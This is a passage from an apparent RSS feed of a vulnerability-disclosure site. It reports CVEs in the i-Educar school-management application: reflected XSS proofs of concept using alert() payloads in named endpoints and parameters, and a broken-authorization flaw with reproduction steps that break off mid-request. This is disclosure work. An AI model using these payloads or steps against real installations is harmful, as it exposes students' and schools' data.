&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10605/image.png&amp;#34;
	width=&amp;#34;736&amp;#34;
	height=&amp;#34;565&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10605/image_hu_61255b2402b529c7.png 480w, /p/cve-2025-10605/image_hu_f2589c925b0a1d14.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;130&amp;#34;
		data-flex-basis=&amp;#34;312px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10606</title>
        <link>https://www.cvehunters.com/p/cve-2025-10606/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10606/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10606-cross-site-scripting-xss-reflected-in-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parameter-tipoacao&amp;#34;&amp;gt;CVE-2025-10606: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;%22%3E%3Cimg%20src=x%20onerror=alert(&amp;amp;#39;XSS-PoC4&amp;amp;#39;)%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10606/image.png&amp;#34;
	width=&amp;#34;746&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10606/image_hu_84c786b72df371af.png 480w, /p/cve-2025-10606/image_hu_80ea8e8254996711.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;330px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10606-cross-site-scripting-xss-reflected-in-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parameter-tipoacao&amp;#34;&amp;gt;CVE-2025-10606: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;%22%3E%3Cimg%20src=x%20onerror=alert(&amp;amp;#39;XSS-PoC4&amp;amp;#39;)%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10606/image.png&amp;#34;
	width=&amp;#34;746&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10606/image_hu_84c786b72df371af.png 480w, /p/cve-2025-10606/image_hu_80ea8e8254996711.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;330px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10607</title>
        <link>https://www.cvehunters.com/p/cve-2025-10607/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10607/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10607-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleavaliacaodiarioapi&amp;#34;&amp;gt;CVE-2025-10607: Broken Object Level Authorization (BOLA) allows enumeration of classes data via &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt; endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Although this vulnerability does not directly expose individual student data, it still constitutes an &amp;lt;b&amp;gt;unauthorized disclosure of academic structure information&amp;lt;/b&amp;gt;, which can be leveraged for enumeration or as a stepping stone for further attacks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10607-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleavaliacaodiarioapi&amp;#34;&amp;gt;CVE-2025-10607: Broken Object Level Authorization (BOLA) allows enumeration of classes data via &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt; endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Although this vulnerability does not directly expose individual student data, it still constitutes an &amp;lt;b&amp;gt;unauthorized disclosure of academic structure information&amp;lt;/b&amp;gt;, which can be leveraged for enumeration or as a stepping stone for further attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /module/Avaliacao/diarioApi&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce &amp;lt;b&amp;gt;object-level authorization&amp;lt;/b&amp;gt;when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Expected behavior:&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Unauthorized users should receive 403 Forbidden or an empty response.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Observed behavior:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user (e.g., student, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10607/image.png&amp;#34;
	width=&amp;#34;1439&amp;#34;
	height=&amp;#34;663&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10607/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10607/image_hu_ecdded4f672254a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;217&amp;#34;
		data-flex-basis=&amp;#34;520px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10607/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;616&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10607/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10607/image-1_hu_5d2f89eaf0785474.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;329px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
